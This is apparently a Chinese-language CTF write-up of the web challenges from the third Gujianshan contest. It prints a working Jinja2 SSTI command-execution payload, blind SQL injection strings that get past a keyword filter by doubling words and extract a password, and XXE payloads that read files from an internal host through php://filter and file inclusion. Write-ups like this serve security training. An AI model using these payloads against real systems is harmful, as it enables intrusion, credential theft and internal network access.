Pr0x1ma'blog

第三届古剑山wp-web

2 min

baby_ssti

没有过滤的ssti,flag在当前目录下,没什么好说的

payload

{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

CMS

之前没遇到过这种题,感觉在打渗透,还有用公共靶机加载也太慢了,没有写脚本的欲望

进入是一个登录界面,测试下来发现是sql,尝试注入时or和select被替换为空,双写绕过,回显只有error报错和成功之后的无回显,布尔盲注,感觉加载太慢了就没去写脚本,直接用burp爆破,刚开始感觉用ascii码爆的太麻烦了,直接就用字符盲注,导致后面爆出密码的时候卡了一下,因为注入的时候大小写不敏感,只能爆出来字母,不知道大写还是小写,绕了一圈换成ascii码才发现后面是大写

爆库名:

admin' oorr (case when (substr(database(),1,1)='h') then 1 else (selselectect 1 union selselectect 2) end)#

heavysql

_古剑山-1

爆表名

username=admin' oorr (case when (mid((selselectect table_name from infoorrmation_schema.tables where table_schema=database() limit 0,1),1,1)='u') then 1 else (selselectect 1 union selselectect 2) end)#&password=a

users

_古剑山-2

爆列名

username=admin' oorr (case when (mid((selselectect column_name from infoorrmation_schema.columns where table_name='users' limit 0,1),1,1)='i') then 1 else (selselectect 1 union selselectect 2) end)#&password=a

id,username,password,user,current_connections

_古剑山-3

_古剑山-4

爆数据

这里要用ascii码,因为大小写不敏感

username=admin' oorr (case when (oorrd(mid((selselectect passwoorrd from users limit 0,1),1,1))=97) then 1 else (selselectect 1 union selselectect 2) end)#&password=a

kingdom123ABC _古剑山-5

登录之后是一个xxe,找了半天没找到flag,在proc/net/arp发现还有内网,平时真没遇到过这样的,找的太久了,再快一点就能抢到血了:(

直接看一下index.php的内容

<!DOCTYPE ANY[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.3/index.php">]><ANY><name>&xxe;</name></ANY>
Cjw/cGhwCiAgICBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBpbmNsdWRlICJmbGFnLnBocCI7CiAgICBpZighJF9HRVRbJ2ZpbGUnXSkKICAgIHsKICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCIuL2luZGV4LnBocCIpOwogICAgfQogICAgJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKICAgIGlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpCiAgICB7CiAgICAgICAgZWNobyAiT2ggbm8hIjsKICAgICAgICBleGl0KCk7CiAgICB9CiAgICBpbmNsdWRlKCRmaWxlKTsKPz4=

_古剑山-6

直接伪协议读flag.php

<!DOCTYPE ANY[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.3/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php">]><ANY><name>&xxe;</name></ANY>

拿到

ClBEOXdhSEFnQ2k4dlpXTm9ieUFpWm14aFozczFNR1k0TkdSaFpqTmhObVJtWkRaaE9XWXlNR001WmpobFpqUXlPRGswTW4waU93by9QZ29L

两次解码

_古剑山-7

_古剑山-8

wp 2025